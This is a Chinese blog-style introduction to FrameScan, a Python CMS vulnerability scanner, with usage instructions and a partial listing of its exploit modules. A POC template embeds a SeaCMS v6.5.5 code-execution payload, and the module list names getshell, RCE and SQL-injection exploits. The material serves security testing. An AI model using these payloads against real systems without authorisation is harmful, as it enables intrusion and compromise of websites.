FrameScan 一款python3编写的简易的cms漏洞检测框架

FrameScan 一款python3编写的简易的cms漏洞检测框架

工具简介

FrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。

支持平台

  • Windows
  • Linux
  • MAC (请自测)

工具特点

  • 单URL批量检测
  • 单URL单漏洞检测
  • 单URL指定CMS检测
  • 多URL单漏洞检测
  • 单URL单漏洞检测
  • 单URL指定CMS检测

Gui版本

下载地址

GitHub:
https://github.com/qianxiao996/FrameScan-GUI
FrameScan-GUI-V1.2.6.zip
②雨苁网盘 w.ddosi.workers.dev

FrameScan 一款python3编写的简易的cms漏洞检测框架
FrameScan 一款python3编写的简易的cms漏洞检测框架

详细参数

    -u          Url                      URL地址
    -f          Load urls file           文件路径
    -m          Use poc module           使用单个POC
    -c          Specify CMS              指定CMS类型
    -s          Search poc keywords      查找关键词漏洞
    -lc         List CMS POC             列出指定CMS漏洞
    -l          List avalible pocs       列出所有POC
    -r          Reload POC               重新加载POC
    -txt        Save Result(txt)         输出扫描结果(txt)
    -html       Save Result(html)        输出扫描结果(html)
    -h          Get help                 帮助信息

使用方法

①下载项目:

下载地址①: GitHub
下载地址②: 雨苁网盘 w.ddosi.workers.dev

git clone https://github.com/qianxiao996/FrameScan

②安装依赖(不需要!)

脚本主要依赖于以下模块(无需安装)
import sys,os,re
from color import *
import sqlite3,requests

③运行脚本

>python3 FrameScan.py
     _____                         ____
    |  ___| __ __ _ _ __ ___   ___/ ___|  ___ __ _ _ __
    | |_ | '__/ _` | '_ ` _ \ / _ \___ \ / __/ _` | '_ \
    |  _|| | | (_| | | | | | |  __/___) | (_| (_| | | | |
    |_|  |_|  \__,_|_| |_| |_|\___|____/ \___\__,_|_| |_|

    Options:                          Code by qianxiao996
    -----------------------------------------------------
    -u          Url                      URL地址
    -f          Load urls file           文件路径
    -m          Use poc module           使用单个POC
    -c          Specify CMS              指定CMS类型
    -s          Search poc keywords      查找关键词漏洞
    -lc         List CMS POC             列出指定CMS漏洞
    -l          List avalible pocs       列出所有POC
    -r          Reload POC               重新加载POC
    -txt        Save Result(txt)         输出扫描结果(txt)
    -html       Save Result(html)        输出扫描结果(html)
    -h          Get help                 帮助信息
    -----------------------------------------------------
    FrameScan  V1.1              Blog:blog.qianxiao996.cn

④单URL批量检测

python3 FrameScan.py -u URL

⑤单URL单漏洞检测(POC_METHOS可以用 -l、-s、-lc进行查询)

python3 FrameScan.py -u URL -m POC_METHOS

⑥单URL指定CMS检测

python3 FrameScan.py -u URL -m POC_METHOS

⑦多URL批量检测

python3 FrameScan.py -f 文件名

⑧多URL单漏洞检测

python3 FrameScan.py -f 文件名  -m  POC_METHOS

⑨多URL指定CMS检测

python3 FrameScan.py -f 文件名  -c  CMS类型

⑩输出到TXT或者HTML文件

python3 FrameScan.py -u URL -txt   文件名
python3 FrameScan.py -u URL -html  文件名

文件名 -c CMS类型

自定义POC模板

代码中采用自定义彩色输出,请尽量规范编写。脚本中为示例代码。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 漏洞名称(禁止换行)控制在30字以内
referer: 漏洞地址(禁止换行)未知请填unknown
author: 作者名
description: 漏洞描述 
'''
import sys
import requests
import warnings
def run(url):
    #此处编辑检测代码
    #示例代码,请更改result内容,result[0]为漏洞名称,result[1]为返回的内容,result[2]为测试结果
    result = ['seacms v6.5.5代码执行漏洞','','']
    headers = {
        "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*"
    url_path = url + "/search.php?phpinfo();"
    try:
        data = requests.get(url_path, timeout=3,headers=headers, verify=False)
        if data.status_code == 200 and 'phpinfo' in data.text:
            result[2]= "存在"
            result[1] = "URL:%s\nPOST:%s"%(url_path,payload)
        else:
            result[2] = "不存在"
    except Exception as e:
        # print (e)
        result[2] ="不存在"
        #这里可设置未知,连接超时等,只有不存在不会显示到结果中。
    return result
    #最后一定要返回一个带有3个参数的列表。不然会出错误。

if __name__ == "__main__":
    #此处不会调用
    warnings.filterwarnings("ignore")
    testVuln = run("http://baidu.com")
    print(testVuln)

工具poc列表

├─acsoft
│  │  GetFileContent_fileread.py
│  │  GetFile_fileread.py
│  │  GetXMLList_fileread.py
│  │
│  └─__pycache__
│          acsoft_GetFileContent_fileread.cpython-37.pyc
│          acsoft_GetFile_fileread.cpython-37.pyc
│          acsoft_GetXMLList_fileread.cpython-37.pyc
│          GetFileContent_fileread.cpython-37.pyc
│          GetFile_fileread.cpython-37.pyc
│          GetXMLList_fileread.cpython-37.pyc
│
├─autoset
│  │  phpmyadmin_unauth.py
│  │
│  └─__pycache__
│          autoset_phpmyadmin_unauth.cpython-37.pyc
│          phpmyadmin_unauth.cpython-37.pyc
│
├─bash
│  │  shellshock.py
│  │
│  └─__pycache__
│          shellshock.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─cmseasy
│  │  header_detail_sqli.py
│  │
│  └─__pycache__
│          cmseasy_header_detail_sqli.cpython-37.pyc
│          header_detail_sqli.cpython-37.pyc
│
├─couchdb
│  │  unauth.py
│  │
│  └─__pycache__
│          couchdb_unauth.cpython-37.pyc
│          unauth.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─dedecms
│  │  download_redirect.py
│  │  error_trace_disclosure.py
│  │  information.py
│  │  recommend_sqli.py
│  │  search_typeArr_sqli.py
│  │  version.py
│  │
│  └─__pycache__
│          dedecms_download_redirect.cpython-37.pyc
│          dedecms_error_trace_disclosure.cpython-37.pyc
│          dedecms_recommend_sqli.cpython-37.pyc
│          dedecms_search_typeArr_sqli.cpython-37.pyc
│          dedecms_version.cpython-37.pyc
│          download_redirect.cpython-37.pyc
│          error_trace_disclosure.cpython-37.pyc
│          information.cpython-37.pyc
│          recommend_sqli.cpython-37.pyc
│          search_typeArr_sqli.cpython-37.pyc
│          version.cpython-37.pyc
│
├─discuz
│  │  focus_flashxss.py
│  │  forum_message_ssrf.py
│  │  plugin_ques_sqli.py
│  │  x25_path_disclosure.py
│  │
│  └─__pycache__
│          discuz_focus_flashxss.cpython-37.pyc
│          discuz_forum_message_ssrf.cpython-37.pyc
│          discuz_plugin_ques_sqli.cpython-37.pyc
│          discuz_x25_path_disclosure.cpython-37.pyc
│          focus_flashxss.cpython-37.pyc
│          forum_message_ssrf.cpython-37.pyc
│          plugin_ques_sqli.cpython-37.pyc
│          x25_path_disclosure.cpython-37.pyc
│
├─diyou
│  │  latesindex_sqli.py
│  │  url_fileread.py
│  │
│  └─__pycache__
│          dyp2p_latesindex_sqli.cpython-37.pyc
│          dyp2p_url_fileread.cpython-37.pyc
│          latesindex_sqli.cpython-37.pyc
│          url_fileread.cpython-37.pyc
│
├─dorado
│  │  default_passwd.py
│  │
│  └─__pycache__
│          default_passwd.cpython-37.pyc
│          dorado_default_passwd.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─dreamgallery
│  │  album_id_sqli.py
│  │
│  └─__pycache__
│          album_id_sqli.cpython-37.pyc
│          dreamgallery_album_id_sqli.cpython-37.pyc
│
├─dswjcms
│  │  p2p_multi_sqli.py
│  │
│  └─__pycache__
│          dswjcms_p2p_multi_sqli.cpython-37.pyc
│          p2p_multi_sqli.cpython-37.pyc
│
├─ecscms
│  │  MoreIndex_sqli.py
│  │
│  └─__pycache__
│          ecscms_MoreIndex_sqli.cpython-37.pyc
│          MoreIndex_sqli.cpython-37.pyc
│
├─ecshop
│  │  eshop_all_code_exec.py
│  │  orderid_sqli.py
│  │  uc_code_sqli.py
│  │
│  └─__pycache__
│          ecshop_flow_orderid_sqli.cpython-37.pyc
│          ecshop_uc_code_sqli.cpython-37.pyc
│          eshop_all_code_exec.cpython-37.pyc
│          orderid_sqli.cpython-37.pyc
│          uc_code_sqli.cpython-37.pyc
│
├─esccms
│  │  selectunitmember_unauth.py
│  │
│  └─__pycache__
│          esccms_selectunitmember_unauth.cpython-37.pyc
│          selectunitmember_unauth.cpython-37.pyc
│
├─etmdcp
│  │  Load_filedownload.py
│  │
│  └─__pycache__
│          etmdcp_Load_filedownload.cpython-37.pyc
│          Load_filedownload.cpython-37.pyc
│
├─eyou
│  │  admin_id_sqli.py
│  │  resetpw.py
│  │  user_kw_sqli.py
│  │  weakpass.py
│  │
│  └─__pycache__
│          admin_id_sqli.cpython-37.pyc
│          eyou_admin_id_sqli.cpython-37.pyc
│          eyou_resetpw.cpython-37.pyc
│          eyou_user_kw_sqli.cpython-37.pyc
│          eyou_weakpass.cpython-37.pyc
│          resetpw.cpython-37.pyc
│          user_kw_sqli.cpython-37.pyc
│          weakpass.cpython-37.pyc
│
├─fastmeeting
│  │  download_filedownload.py
│  │
│  └─__pycache__
│          download_filedownload.cpython-37.pyc
│          fastmeeting_download_filedownload.cpython-37.pyc
│
├─finecms
│  │  uploadfile.py
│  │  v508_getshell.py
│  │  v508_write_file.py
│  │
│  └─__pycache__
│          finecms_508_getshell.cpython-37.pyc
│          finecms_508_write_file.cpython-37.pyc
│          finecms_uploadfile.cpython-37.pyc
│          uploadfile.cpython-37.pyc
│          v508_getshell.cpython-37.pyc
│          v508_write_file.cpython-37.pyc
│
├─foosun
│  │  City_ajax_sqli.py
│  │
│  └─__pycache__
│          City_ajax_sqli.cpython-37.pyc
│          foosun_City_ajax_sqli.cpython-37.pyc
│
├─fsmcms
│  │  columninfo_sqli.py
│  │  p_replydetail_sqli.py
│  │  setup_reinstall.py
│  │
│  └─__pycache__
│          columninfo_sqli.cpython-37.pyc
│          fsmcms_columninfo_sqli.cpython-37.pyc
│          fsmcms_p_replydetail_sqli.cpython-37.pyc
│          fsmcms_setup_reinstall.cpython-37.pyc
│          p_replydetail_sqli.cpython-37.pyc
│          setup_reinstall.cpython-37.pyc
│
├─glassfish
│  │  fileread.py
│  │
│  └─__pycache__
│          fileread.cpython-37.pyc
│          glassfish_fileread.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─goahead
│  │  LD_PRELOAD_rce.py
│  │
│  ├─bin
│  │      goahead_payload.so
│  │
│  └─__pycache__
│          goahead_LD_PRELOAD_rce.cpython-37.pyc
│          LD_PRELOAD_rce.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─gobetters
│  │  multi_sqli.py
│  │
│  └─__pycache__
│          gobetters_multi_sqli.cpython-37.pyc
│          multi_sqli.cpython-37.pyc
│
├─gowinsoft_jw
│  │  jw_multi_sqli.py
│  │
│  └─__pycache__
│          gowinsoft_jw_multi_sqli.cpython-37.pyc
│          jw_multi_sqli.cpython-37.pyc
│
├─gpower
│  │  users_disclosure.py
│  │
│  └─__pycache__
│          gpower_users_disclosure.cpython-37.pyc
│          users_disclosure.cpython-37.pyc
│
├─hanweb
│  │  downfile_filedownload.py
│  │  readxml_fileread.py
│  │  VerifyCodeServlet_install.py
│  │
│  └─__pycache__
│          downfile_filedownload.cpython-37.pyc
│          hanweb_downfile_filedownload.cpython-37.pyc
│          hanweb_readxml_fileread.cpython-37.pyc
│          hanweb_VerifyCodeServlet_install.cpython-37.pyc
│          readxml_fileread.cpython-37.pyc
│          VerifyCodeServlet_install.cpython-37.pyc
│
├─hfs
│  │  rejetto_search_rce.py
│  │
│  └─__pycache__
│          hfs_rejetto_search_rce.cpython-37.pyc
│          rejetto_search_rce.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─Hishop
│  │  productlist_sqli.py
│  │
│  └─__pycache__
│          hishop_productlist_sqli.cpython-37.pyc
│          productlist_sqli.cpython-37.pyc
│
├─HTTP_SYS
│  │  HTTP_SYS_EXEC.py
│  │
│  └─__pycache__
│          HTTP_SYS_EXEC.cpython-37.pyc
│
├─hudson
│  │  ws_disclosure.py
│  │
│  └─__pycache__
│          hudson_ws_disclosure.cpython-37.pyc
│          ws_disclosure.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─iGenus
│  │  code_exec.py
│  │  login_Lang_fileread.py
│  │  syslogin_Lang_fileread.py
│  │
│  └─__pycache__
│          code_exec.cpython-37.pyc
│          igenus_code_exec.cpython-37.pyc
│          igenus_login_Lang_fileread.cpython-37.pyc
│          igenus_syslogin_Lang_fileread.cpython-37.pyc
│          login_Lang_fileread.cpython-37.pyc
│          syslogin_Lang_fileread.cpython-37.pyc
│
├─iis
│  │  ms15034_httpsys_rce.py
│  │  webdav_rce.py
│  │
│  └─__pycache__
│          iis_ms15034_httpsys_rce.cpython-37.pyc
│          iis_webdav_rce.cpython-37.pyc
│          ms15034_httpsys_rce.cpython-37.pyc
│          webdav_rce.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─inspur
│  │  ecgap_displayNewsPic_sqli.py
│  │  multi_sqli.py
│  │
│  └─__pycache__
│          ecgap_displayNewsPic_sqli.cpython-37.pyc
│          inspur_ecgap_displayNewsPic_sqli.cpython-37.pyc
│          inspur_multi_sqli.cpython-37.pyc
│          multi_sqli.cpython-37.pyc
│
├─intel
│  │  amt_crypt_bypass.py
│  │
│  └─__pycache__
│          amt_crypt_bypass.cpython-37.pyc
│          intel_amt_crypt_bypass.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─iwms
│  │  bypass_js_delete.py
│  │
│  └─__pycache__
│          bypass_js_delete.cpython-37.pyc
│          iwms_bypass_js_delete.cpython-37.pyc
│
├─jeecg
│  │  pwd_reset.py
│  │
│  └─__pycache__
│          jeecg_pwd_reset.cpython-37.pyc
│          pwd_reset.cpython-37.pyc
│
├─jeecms
│  │  fpath_filedownload.py
│  │
│  └─__pycache__
│          fpath_filedownload.cpython-37.pyc
│          jeecms_fpath_filedownload.cpython-37.pyc
│
├─joomla
│  │  com_docman_lfi.py
│  │  index_list_sqli.py
│  │
│  └─__pycache__
│          com_docman_lfi.cpython-37.pyc
│          index_list_sqli.cpython-37.pyc
│          joomla_com_docman_lfi.cpython-37.pyc
│          joomla_index_list_sqli.cpython-37.pyc
│
├─jumboecms
│  │  slide_id_sqli.py
│  │
│  └─__pycache__
│          jumboecms_slide_id_sqli.cpython-37.pyc
│          slide_id_sqli.cpython-37.pyc
│
├─kingdee
│  │  conf_disclosure.py
│  │  filedownload.py
│  │  logoImgServlet_fileread.py
│  │  resin_dir_path_disclosure.py
│  │
│  └─__pycache__
│          conf_disclosure.cpython-37.pyc
│          filedownload.cpython-37.pyc
│          kingdee_conf_disclosure.cpython-37.pyc
│          kingdee_filedownload.cpython-37.pyc
│          kingdee_logoImgServlet_fileread.cpython-37.pyc
│          kingdee_resin_dir_path_disclosure.cpython-37.pyc
│          logoImgServlet_fileread.cpython-37.pyc
│          resin_dir_path_disclosure.cpython-37.pyc
│
├─kxmail
│  │  login_server_sqli.py
│  │
│  └─__pycache__
│          kxmail_login_server_sqli.cpython-37.pyc
│          login_server_sqli.cpython-37.pyc
│
├─lbcms
│  │  webwsfw_bssh_sqli.py
│  │
│  └─__pycache__
│          lbcms_webwsfw_bssh_sqli.cpython-37.pyc
│          webwsfw_bssh_sqli.cpython-37.pyc
│
├─libsys
│  │  ajax_asyn_link_fileread.py
│  │  ajax_asyn_link_old_fileread.py
│  │  ajax_get_file_fileread.py
│  │
│  └─__pycache__
│          ajax_asyn_link_fileread.cpython-37.pyc
│          ajax_asyn_link_old_fileread.cpython-37.pyc
│          ajax_get_file_fileread.cpython-37.pyc
│          libsys_ajax_asyn_link_fileread.cpython-37.pyc
│          libsys_ajax_asyn_link_old_fileread.cpython-37.pyc
│          libsys_ajax_get_file_fileread.cpython-37.pyc
│
├─live800
│  │  downlog_filedownload.py
│  │  fileDownloadServer_fileread.py
│  │  loginAction_sqli.py
│  │  sta_export_sqli.py
│  │
│  └─__pycache__
│          downlog_filedownload.cpython-37.pyc
│          fileDownloadServer_fileread.cpython-37.pyc
│          live800_downlog_filedownload.cpython-37.pyc
│          live800_fileDownloadServer_fileread.cpython-37.pyc
│          live800_loginAction_sqli.cpython-37.pyc
│          live800_services_xxe.cpython-37.pyc
│          live800_sta_export_sqli.cpython-37.pyc
│          loginAction_sqli.cpython-37.pyc
│          services_xxe.cpython-37.pyc
│          sta_export_sqli.cpython-37.pyc
│
├─looyu
│  │  down_filedownload.py
│  │
│  └─__pycache__
│          down_filedownload.cpython-37.pyc
│          looyu_down_filedownload.cpython-37.pyc
│
├─metinfo
│  │  getpassword_sqli.py
│  │  login_check_sqli.py
│  │
│  └─__pycache__
│          getpassword_sqli.cpython-37.pyc
│          login_check_sqli.cpython-37.pyc
│          metinfo_getpassword_sqli.cpython-37.pyc
│          metinfo_login_check_sqli.cpython-37.pyc
│
├─ndstar
│  │  six_sqli.py
│  │
│  └─__pycache__
│          ndstar_six_sqli.cpython-37.pyc
│          six_sqli.cpython-37.pyc
│
├─nitc
│  │  index_language_id_sqli.py
│  │  suggestwordList_sqli.py
│  │
│  └─__pycache__
│          index_language_id_sqli.cpython-37.pyc
│          nitc_index_language_id_sqli.cpython-37.pyc
│          nitc_suggestwordList_sqli.cpython-37.pyc
│          suggestwordList_sqli.cpython-37.pyc
│
├─opensns
│  │  index_arearank.py
│  │  index_getshell.py
│  │
│  └─__pycache__
│          index_arearank.cpython-37.pyc
│          index_getshell.cpython-37.pyc
│          opensns_index_arearank.cpython-37.pyc
│          opensns_index_getshell.cpython-37.pyc
│
├─others
│  │  alkawebs_viewnews_sqli.py
│  │  anmai_grghjl_stuNo_sqli.py
│  │  anmai_teachingtechnology_sqli.py
│  │  caitong_multi_sleep_sqli.py
│  │  caitong_multi_sqli.py
│  │  clib_kindaction_fileread.py
│  │  clib_kinweblistaction_download.py
│  │  damall_selloffer_sqli.py
│  │  dkcms_database_disclosure.py
│  │  domino_unauth.py
│  │  efuture_downloadAct_filedownload.py
│  │  eis_menu_left_edit_sqli.py
│  │  euse_study_multi_sqli.py
│  │  forease_fileinclude_code_exec.py
│  │  gevercms_downLoadFile_filedownload.py
│  │  gn_consulting_sqli.py
│  │  gpcsoft_ewebeditor_weak.py
│  │  gxwssb_fileDownloadmodel_download.py
│  │  haohan_FileDown_filedownload.py
│  │  hezhong_list_id_sqli.py
│  │  hjsoft_sqli.py
│  │  hnkj_researchinfo_dan_sqli.py
│  │  hongan_dlp_struts_exec.py
│  │  huaficms_bypass_js.py
│  │  ips_community_suite_code_exec.py
│  │  jiuyu_library_struts_exec.py
│  │  jxt1039_unauth.py
│  │  kj65n_monitor_sqli.py
│  │  lianbang_multi_bypass_priv.py
│  │  mainone_b2b_Default_sqli.py
│  │  mainone_ProductList_sqli.py
│  │  mainone_SupplyList_sqli.py
│  │  mallbuilder_change_status_sqli.py
│  │  mingteng_cookie_deception.py
│  │  newedos_multi_sqli.py
│  │  nongyou_Item2_sqli.py
│  │  nongyou_multi_sqli.py
│  │  nongyou_ShowLand_sqli.py
│  │  nongyou_sleep_sqli.py
│  │  rap_interface_struts_exec.py
│  │  shiyou_list_keyWords_sqli.py
│  │  sinda_downloadfile_download.py
│  │  skytech_bypass_priv.py
│  │  skytech_geren_list_page_sqli.py
│  │  star_PostSuggestion_sqli.py
│  │  suntown_upfile_fileupload.py
│  │  tianbo_Class_Info_sqli.py
│  │  tianbo_St_Info_sqli.py
│  │  tianbo_TCH_list_sqli.py
│  │  tianbo_Type_List_sqli.py
│  │  tpshop_eval_stdin_code_exec.py
│  │  workyi_multi_sqli.py
│  │  xtcms_download_filedownload.py
│  │  xuezi_ceping_unauth.py
│  │  yaojie_steel_struts_exec.py
│  │  yeu_disclosure_uid.py
│  │  zfcgxt_UserSecurityController_getpass.py
│  │  zf_cms_FileDownload.py
│  │  zhuofan_downLoadFile_download.py
│  │
│  └─__pycache__
│          alkawebs_viewnews_sqli.cpython-37.pyc
│          anmai_grghjl_stuNo_sqli.cpython-37.pyc
│          anmai_teachingtechnology_sqli.cpython-37.pyc
│          caitong_multi_sleep_sqli.cpython-37.pyc
│          caitong_multi_sqli.cpython-37.pyc
│          cicro_DownLoad_filedownload.cpython-37.pyc
│          clib_kindaction_fileread.cpython-37.pyc
│          clib_kinweblistaction_download.cpython-37.pyc
│          damall_selloffer_sqli.cpython-37.pyc
│          dkcms_database_disclosure.cpython-37.pyc
│          domino_unauth.cpython-37.pyc
│          efuture_downloadAct_filedownload.cpython-37.pyc
│          eis_menu_left_edit_sqli.cpython-37.pyc
│          euse_study_multi_sqli.cpython-37.pyc
│          forease_fileinclude_code_exec.cpython-37.pyc
│          gevercms_downLoadFile_filedownload.cpython-37.pyc
│          gn_consulting_sqli.cpython-37.pyc
│          gpcsoft_ewebeditor_weak.cpython-37.pyc
│          gxwssb_fileDownloadmodel_download.cpython-37.pyc
│          haohan_FileDown_filedownload.cpython-37.pyc
│          hezhong_list_id_sqli.cpython-37.pyc
│          hjsoft_sqli.cpython-37.pyc
│          hnkj_researchinfo_dan_sqli.cpython-37.pyc
│          hongan_dlp_struts_exec.cpython-37.pyc
│          huaficms_bypass_js.cpython-37.pyc
│          ips_community_suite_code_exec.cpython-37.pyc
│          jiuyu_library_struts_exec.cpython-37.pyc
│          jxt1039_unauth.cpython-37.pyc
│          kj65n_monitor_sqli.cpython-37.pyc
│          lianbang_multi_bypass_priv.cpython-37.pyc
│          mainone_b2b_Default_sqli.cpython-37.pyc
│          mainone_ProductList_sqli.cpython-37.pyc
│          mainone_SupplyList_sqli.cpython-37.pyc
│          mallbuilder_change_status_sqli.cpython-37.pyc
│          mingteng_cookie_deception.cpython-37.pyc
│          newedos_multi_sqli.cpython-37.pyc
│          nongyou_Item2_sqli.cpython-37.pyc
│          nongyou_multi_sqli.cpython-37.pyc
│          nongyou_ShowLand_sqli.cpython-37.pyc
│          nongyou_sleep_sqli.cpython-37.pyc
│          rap_interface_struts_exec.cpython-37.pyc
│          shiyou_list_keyWords_sqli.cpython-37.pyc
│          sinda_downloadfile_download.cpython-37.pyc
│          skytech_bypass_priv.cpython-37.pyc
│          skytech_geren_list_page_sqli.cpython-37.pyc
│          star_PostSuggestion_sqli.cpython-37.pyc
│          suntown_upfile_fileupload.cpython-37.pyc
│          tianbo_Class_Info_sqli.cpython-37.pyc
│          tianbo_St_Info_sqli.cpython-37.pyc
│          tianbo_TCH_list_sqli.cpython-37.pyc
│          tianbo_Type_List_sqli.cpython-37.pyc
│          tpshop_eval_stdin_code_exec.cpython-37.pyc
│          workyi_multi_sqli.cpython-37.pyc
│          xtcms_download_filedownload.cpython-37.pyc
│          xuezi_ceping_unauth.cpython-37.pyc
│          yaojie_steel_struts_exec.cpython-37.pyc
│          yeu_disclosure_uid.cpython-37.pyc
│          zfcgxt_UserSecurityController_getpass.cpython-37.pyc
│          zf_cms_FileDownload.cpython-37.pyc
│          zhuofan_downLoadFile_download.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─pageadmin
│  │  forge_viewstate.py
│  │
│  └─__pycache__
│          forge_viewstate.cpython-37.pyc
│          pageadmin_forge_viewstate.cpython-37.pyc
│
├─php
│  │  expose_disclosure.py
│  │  fastcgi_read.py
│  │
│  └─__pycache__
│          expose_disclosure.cpython-37.pyc
│          fastcgi_read.cpython-37.pyc
│          php_expose_disclosure.cpython-37.pyc
│          php_fastcgi_read.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─php168
│  │  login_getshell.py
│  │
│  └─__pycache__
│          login_getshell.cpython-37.pyc
│          php168_login_getshell.cpython-37.pyc
│
├─phpcms
│  │  authkey_disclosure.py
│  │  digg_add_sqli.py
│  │  flash_upload_sqli.py
│  │  product_code_exec.py
│  │  v961_fileread.py
│  │  v96_sqli.py
│  │  v9_flash_xss.py
│  │
│  └─__pycache__
│          authkey_disclosure.cpython-37.pyc
│          digg_add_sqli.cpython-37.pyc
│          flash_upload_sqli.cpython-37.pyc
│          phpcms_authkey_disclosure.cpython-37.pyc
│          phpcms_digg_add_sqli.cpython-37.pyc
│          phpcms_flash_upload_sqli.cpython-37.pyc
│          phpcms_product_code_exec.cpython-37.pyc
│          phpcms_v961_fileread.cpython-37.pyc
│          phpcms_v96_sqli.cpython-37.pyc
│          phpcms_v9_flash_xss.cpython-37.pyc
│          product_code_exec.cpython-37.pyc
│          v961_fileread.cpython-37.pyc
│          v96_sqli.cpython-37.pyc
│          v9_flash_xss.cpython-37.pyc
│
├─phpmyadmin
│  │  setup_lfi.py
│  │
│  └─__pycache__
│          phpmyadmin_setup_lfi.cpython-37.pyc
│          setup_lfi.cpython-37.pyc
│
├─phpok
│  │  api_param_sqli.py
│  │  remote_image_getshell.py
│  │  res_action_control_filedownload.py
│  │
│  └─__pycache__
│          api_param_sqli.cpython-37.pyc
│          phpok_api_param_sqli.cpython-37.pyc
│          phpok_remote_image_getshell.cpython-37.pyc
│          phpok_res_action_control_filedownload.cpython-37.pyc
│          remote_image_getshell.cpython-37.pyc
│          res_action_control_filedownload.cpython-37.pyc
│
├─phpstudy
│  │  phpmyadmin_defaultpwd.py
│  │  phpstudy_backdoor.py
│  │  probe.py
│  │
│  └─__pycache__
│          phpmyadmin_defaultpwd.cpython-37.pyc
│          phpstudy_backdoor.cpython-37.pyc
│          phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc
│          phpstudy_probe.cpython-37.pyc
│          probe.cpython-37.pyc
│
├─piaoyou
│  │  int_order_sqli.py
│  │  multi_sqli.py
│  │  newsview_list.py
│  │  six2_sqli.py
│  │  six_sqli.py
│  │  ten_sqli.py
│  │
│  └─__pycache__
│          int_order_sqli.cpython-37.pyc
│          multi_sqli.cpython-37.pyc
│          newsview_list.cpython-37.pyc
│          piaoyou_int_order_sqli.cpython-37.pyc
│          piaoyou_multi_sqli.cpython-37.pyc
│          piaoyou_newsview_list.cpython-37.pyc
│          piaoyou_six2_sqli.cpython-37.pyc
│          piaoyou_six_sqli.cpython-37.pyc
│          piaoyou_ten_sqli.cpython-37.pyc
│          six2_sqli.cpython-37.pyc
│          six_sqli.cpython-37.pyc
│          ten_sqli.cpython-37.pyc
│
├─PKPMBS
│  │  addresslist_keyword_sqli.py
│  │  guestbook_sqli.py
│  │  MsgList_sqli.py
│  │
│  └─__pycache__
│          addresslist_keyword_sqli.cpython-37.pyc
│          guestbook_sqli.cpython-37.pyc
│          MsgList_sqli.cpython-37.pyc
│          pkpmbs_addresslist_keyword_sqli.cpython-37.pyc
│          pkpmbs_guestbook_sqli.cpython-37.pyc
│          pkpmbs_MsgList_sqli.cpython-37.pyc
│
├─pstar
│  │  isfLclInfo_sqli.py
│  │  qcustoms_sqli.py
│  │  warehouse_msg_01_sqli.py
│  │
│  └─__pycache__
│          isfLclInfo_sqli.cpython-37.pyc
│          pstar_isfLclInfo_sqli.cpython-37.pyc
│          pstar_qcustoms_sqli.cpython-37.pyc
│          pstar_warehouse_msg_01_sqli.cpython-37.pyc
│          qcustoms_sqli.cpython-37.pyc
│          warehouse_msg_01_sqli.cpython-37.pyc
│
├─qibocms
│  │  js_f_id_sqli.py
│  │  search_code_exec.py
│  │  search_sqli.py
│  │  s_fids_sqli.py
│  │
│  └─__pycache__
│          js_f_id_sqli.cpython-37.pyc
│          qibocms_js_f_id_sqli.cpython-37.pyc
│          qibocms_search_code_exec.cpython-37.pyc
│          qibocms_search_sqli.cpython-37.pyc
│          qibocms_s_fids_sqli.cpython-37.pyc
│          search_code_exec.cpython-37.pyc
│          search_sqli.cpython-37.pyc
│          s_fids_sqli.cpython-37.pyc
│
├─resin
│  │  viewfile_fileread.py
│  │
│  └─__pycache__
│          resin_viewfile_fileread.cpython-37.pyc
│          viewfile_fileread.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─ruvar
│  │  multi_sqli.py
│  │  multi_sqli2.py
│  │  multi_sqli3.py
│  │
│  └─__pycache__
│          multi_sqli.cpython-37.pyc
│          multi_sqli2.cpython-37.pyc
│          multi_sqli3.cpython-37.pyc
│          ruvar_oa_multi_sqli.cpython-37.pyc
│          ruvar_oa_multi_sqli2.cpython-37.pyc
│          ruvar_oa_multi_sqli3.cpython-37.pyc
│
├─sangfor
│  │  ad_script_command_exec.py
│  │
│  └─__pycache__
│          ad_script_command_exec.cpython-37.pyc
│          sangfor_ad_script_command_exec.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─seacms
│  │  order_code_exec.py
│  │  search_code_exec.py
│  │  search_jq_code_exec.py
│  │  v655_code_exec.py
│  │
│  └─__pycache__
│          order_code_exec.cpython-37.pyc
│          seacms_655_code_exec.cpython-37.pyc
│          seacms_backstage_getshell.cpython-37.pyc
│          seacms_order_code_exec.cpython-37.pyc
│          seacms_search_code_exec.cpython-37.pyc
│          seacms_search_jq_code_exec.cpython-37.pyc
│          search_code_exec.cpython-37.pyc
│          search_jq_code_exec.cpython-37.pyc
│          v655_code_exec.cpython-37.pyc
│
├─shadowsit
│  │  selector_lfi.py
│  │
│  └─__pycache__
│          selector_lfi.cpython-37.pyc
│          shadowsit_selector_lfi.cpython-37.pyc
│
├─shop360
│  │  do_filedownload.py
│  │
│  └─__pycache__
│          do_filedownload.cpython-37.pyc
│          shop360_do_filedownload.cpython-37.pyc
│
├─shop7z
│  │  order_checknoprint_sqli.py
│  │
│  └─__pycache__
│          order_checknoprint_sqli.cpython-37.pyc
│          shop7z_order_checknoprint_sqli.cpython-37.pyc
│
├─shopex
│  │  phpinfo_disclosure.py
│  │
│  └─__pycache__
│          phpinfo_disclosure.cpython-37.pyc
│          shopex_phpinfo_disclosure.cpython-37.pyc
│
├─shopnc
│  │  index_class_id_sqli.py
│  │
│  └─__pycache__
│          index_class_id_sqli.cpython-37.pyc
